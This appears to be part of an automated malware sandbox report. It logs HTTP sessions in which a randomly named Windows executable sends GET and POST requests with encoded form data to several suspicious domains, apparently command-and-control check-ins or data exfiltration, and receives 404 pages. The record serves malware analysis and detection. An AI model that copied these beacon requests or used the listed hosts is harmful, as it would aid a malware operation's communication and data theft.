            12192.168.2.649736167.172.133.32802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:46.233227968 CEST506OUTGET /zctj/?cLqL3H=tSuw7IYRRjv+wnLRJKBizfUbw5DKe+pV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEhfsOfW9Q7idqDaQ0/bUKrb6lVOs08wJGK3g6GM4oAhkBtSiykhk4=&rZwP=sHyxifGPIFN HTTP/1.1
            Host: www.onlytradez.club
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Sep 2, 2024 09:08:46.680681944 CEST705INHTTP/1.1 404 Not Found
            Server: nginx/1.26.1
            Date: Mon, 02 Sep 2024 07:08:46 GMT
            Content-Type: text/html
            Content-Length: 555
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            13192.168.2.649737206.119.82.116802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:52.579215050 CEST746OUTPOST /kyiu/ HTTP/1.1
            Host: www.32wxd.top
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.32wxd.top
            Referer: http://www.32wxd.top/kyiu/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 211
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 2f 32 67 4a 79 76 75 67 42 2f 42 65 43 4a 53 2f 6e 5a 2f 37 62 67 51 31 41 61 48 42 30 55 4e 72 39 69 33 58 71 6b 4e 36 6e 47 32 44 6b 5a 73 4a 42 2b 78 38 37 78 56 30 56 31 39 5a 4b 52 4d 79 4d 78 6b 2b 4a 41 73 4b 70 61 51 6f 33 4a 71 68 74 6e 7a 41 78 38 5a 30 62 4e 5a 30 52 32 48 33 68 65 75 48 32 67 6e 52 73 61 7a 48 4e 31 6b 68 39 76 52 4e 54 31 2b 38 4e 35 6a 73 31 46 5a 4f 55 52 37 2b 38 78 4e 56 68 44 48 4a 59 46 78 45 73 6c 6a 41 44 37 54 49 57 66 58 51 2b 53 48 6e 51 56 68 46 6c 73 65 63 4f 63 70 2b 76 68 4c 62 42 6b 4f 4a 35 54 79 45 69 65 46 6f 44 34 31
            Data Ascii: cLqL3H=aBuNv8bUDAAzG/2gJyvugB/BeCJS/nZ/7bgQ1AaHB0UNr9i3XqkN6nG2DkZsJB+x87xV0V19ZKRMyMxk+JAsKpaQo3JqhtnzAx8Z0bNZ0R2H3heuH2gnRsazHN1kh9vRNT1+8N5js1FZOUR7+8xNVhDHJYFxEsljAD7TIWfXQ+SHnQVhFlsecOcp+vhLbBkOJ5TyEieFoD41
            Sep 2, 2024 09:08:53.437813044 CEST691INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 02 Sep 2024 07:08:53 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            14192.168.2.649738206.119.82.116802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:55.131266117 CEST770OUTPOST /kyiu/ HTTP/1.1
            Host: www.32wxd.top
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.32wxd.top
            Referer: http://www.32wxd.top/kyiu/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 235
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 38 4e 72 64 79 33 57 76 45 4e 35 6e 47 32 4c 45 5a 70 58 78 2b 41 38 37 38 32 30 55 4a 39 5a 4b 56 4d 79 4f 5a 6b 2f 36 6f 76 4c 35 61 57 30 33 4a 37 6c 74 6e 7a 41 78 38 5a 30 62 59 45 30 52 65 48 32 51 4f 75 56 44 41 6f 53 73 61 77 4e 74 31 6b 6c 39 75 57 4e 54 31 58 38 4d 6b 45 73 77 42 5a 4f 56 68 37 36 35 64 43 66 68 44 4e 58 6f 45 54 44 35 63 30 47 78 32 71 4b 6c 65 32 48 76 6a 69 72 47 55 37 5a 57 73 39 4f 65 38 72 2b 74 35 35 62 68 6b 6b 4c 35 72 79 57 31 53 69 6e 33 64 57 61 32 58 4b 63 33 38 67 73 6c 4a 46 58 34 38 36 4a 70 39 4c 7a 77 3d 3d
            Data Ascii: cLqL3H=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBC8Nrdy3WvEN5nG2LEZpXx+A87820UJ9ZKVMyOZk/6ovL5aW03J7ltnzAx8Z0bYE0ReH2QOuVDAoSsawNt1kl9uWNT1X8MkEswBZOVh765dCfhDNXoETD5c0Gx2qKle2HvjirGU7ZWs9Oe8r+t55bhkkL5ryW1Sin3dWa2XKc38gslJFX486Jp9Lzw==
            Sep 2, 2024 09:08:55.985672951 CEST691INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 02 Sep 2024 07:08:55 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            15192.168.2.649739206.119.82.116802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:57.790405989 CEST1783OUTPOST /kyiu/ HTTP/1.1
            Host: www.32wxd.top
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.32wxd.top
            Referer: http://www.32wxd.top/kyiu/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 1247
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 45 4e 72 4f 71 33 58 4f 45 4e 34 6e 47 32 49 45 5a 6f 58 78 2b 5a 38 37 6b 71 30 55 46 4c 5a 4a 39 4d 77 74 68 6b 34 4c 6f 76 46 35 61 57 2f 58 4a 72 68 74 6e 69 41 78 73 6a 30 62 49 45 30 52 65 48 32 53 6d 75 43 47 67 6f 55 73 61 7a 48 4e 31 67 68 39 76 78 4e 53 64 74 38 4d 67 2b 76 45 31 5a 4f 31 78 37 38 66 4a 43 5a 78 44 44 57 6f 45 31 44 35 5a 7a 47 78 72 56 4b 6d 44 62 48 73 2f 69 75 54 56 34 44 58 4e 6a 4e 39 4d 66 2b 73 55 65 55 55 38 42 4c 70 2f 4d 54 44 6d 73 73 58 42 44 65 68 2f 56 57 47 64 50 74 46 49 6f 4c 39 64 4c 64 70 67 5a 6c 78 6f 68 2f 62 6f 39 6f 45 68 37 69 6c 34 78 53 63 34 56 42 79 43 73 59 38 59 75 61 6b 38 59 74 37 36 4d 67 67 6f 5a 76 4c 73 50 62 4d 70 4c 63 6e 4f 53 74 39 36 4f 4a 6c 41 75 76 41 49 41 4d 77 59 4f 78 67 47 4b 35 56 46 36 66 62 6a 37 43 6f 37 76 4b 78 6a 35 44 53 36 51 77 4f 4b 54 57 61 45 70 65 4f 58 79 7a 67 54 [TRUNCATED]
            Data Ascii: cLqL3H=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBCENrOq3XOEN4nG2IEZoXx+Z87kq0UFLZJ9Mwthk4LovF5aW/XJrhtniAxsj0bIE0ReH2SmuCGgoUsazHN1gh9vxNSdt8Mg+vE1ZO1x78fJCZxDDWoE1D5ZzGxrVKmDbHs/iuTV4DXNjN9Mf+sUeUU8BLp/MTDmssXBDeh/VWGdPtFIoL9dLdpgZlxoh/bo9oEh7il4xSc4VByCsY8Yuak8Yt76MggoZvLsPbMpLcnOSt96OJlAuvAIAMwYOxgGK5VF6fbj7Co7vKxj5DS6QwOKTWaEpeOXyzgTShDuCPPbglQRptSwY39lEwIrRRbeScI5d6J7iENUl6/MEKxnGwG/szvukCkoI1IKLaqpiXBWUrm0S3eT2rXQYGPXeXlGSZBeAy9UAMSgMFDABeM+VhuiuFN/rFzgrhvNV1H7wl0oHy7Ar1FLDBpQtzdSvV8Bd948iskc+3HdCABiPdJWup0U2qNBwKv0y5NsjT0uNlNIoHMebyd3H2833vg2z4M2x6qjC4jEWhVlDbDmB4WPOyDM9v4NLRRZpWImXK/VbVauQFrGzvoXnj/P1x9WtjB6+ezjgK/gnV6kMAQ1VMUqOAprEVf2F8M+KDxmGt6QqNYwEIgoVNvpHOPynKHwSv68tjyWrA0qeZZoC7Mvn5MAIxQUSK2r47AcTHkIObnKmnuOY29qxi2MziEeyprpq/N6ewnUtw/owK1SvroX4LFmB/+JsJDiE076g8nb9WrmqkoMkmzu3x2H8QR0Vaf+8KStzI6sj764BnLXD2k9haKfw6yliryUZCIX+DcJN7Rc3TYUI05PWC/2R922lhhdLrs6isWCDT1H0spTkU5dpXu/wBuCINzROqVBkYgNoniSVmT1Q4nGL8YxeHKAsI3Gl/7YCKoqrUfZucTS11Q6by42jIXPicYiGRFW65UGg5suG3aa+XnQ8aANBHSvaY31/9OqSrKjeG [TRUNCATED]
            Sep 2, 2024 09:08:58.619024038 CEST691INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 02 Sep 2024 07:08:58 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            16192.168.2.649740206.119.82.116802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:00.421274900 CEST500OUTGET /kyiu/?rZwP=sHyxifGPIFN&cLqL3H=XDGtsL25HTw6JP64VC7y2QrABH1070ZVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszHLGx0l4jqt7JLz8z3pwCpHaPnAKrE0wOd8iQCO012svuMCQv9qI= HTTP/1.1
            Host: www.32wxd.top
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Sep 2, 2024 09:09:01.243371964 CEST691INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 02 Sep 2024 07:09:01 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            17192.168.2.64974166.29.149.180802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:06.450954914 CEST743OUTPOST /f9bc/ HTTP/1.1
            Host: www.jaxo.xyz
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.jaxo.xyz
            Referer: http://www.jaxo.xyz/f9bc/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 211
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 51 4b 51 57 34 33 4a 50 6a 74 63 65 6b 54 6c 65 6a 61 56 32 31 61 5a 38 68 46 7a 6f 33 41 73 74 6e 53 76 43 6f 43 32 41 72 79 65 55 45 77 78 70 2f 50 55 75 63 54 45 6c 4e 68 57 62 65 69 77 6c 31 2f 6f 56 79 4c 64 32 4a 35 2b 6e 7a 77 39 36 64 70 50 6e 47 64 76 58 54 36 35 42 51 30 6d 50 50 33 65 38 44 63 79 4b 70 6a 6f 32 44 46 37 79 52 4b 2b 56 48 46 4c 70 41 37 34 61 6d 66 67 59 35 50 34 38 78 42 7a 50 62 63 7a 49 4c 34 58 63 43 7a 74 56 72 57 59 4a 63 33 7a 56 4d 45 4e 4d 69 76 4a 69 54 48 4c 54 59 67 69 76 71 56 61 38 32 32 30 43 72 42 79 65 79 36 77 61 65 5a 2f 72
            Data Ascii: cLqL3H=3QjmXr4dAreEQKQW43JPjtcekTlejaV21aZ8hFzo3AstnSvCoC2AryeUEwxp/PUucTElNhWbeiwl1/oVyLd2J5+nzw96dpPnGdvXT65BQ0mPP3e8DcyKpjo2DF7yRK+VHFLpA74amfgY5P48xBzPbczIL4XcCztVrWYJc3zVMENMivJiTHLTYgivqVa8220CrByey6waeZ/r
            Sep 2, 2024 09:09:07.039143085 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:09:06 GMT
            Server: Apache
            Content-Length: 13840
            Connection: close
            Content-Type: text/html
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
            Sep 2, 2024 09:09:07.039158106 CEST1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
            Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
            Sep 2, 2024 09:09:07.039165974 CEST1236INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
            Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
            Sep 2, 2024 09:09:07.039434910 CEST1236INData Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
            Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
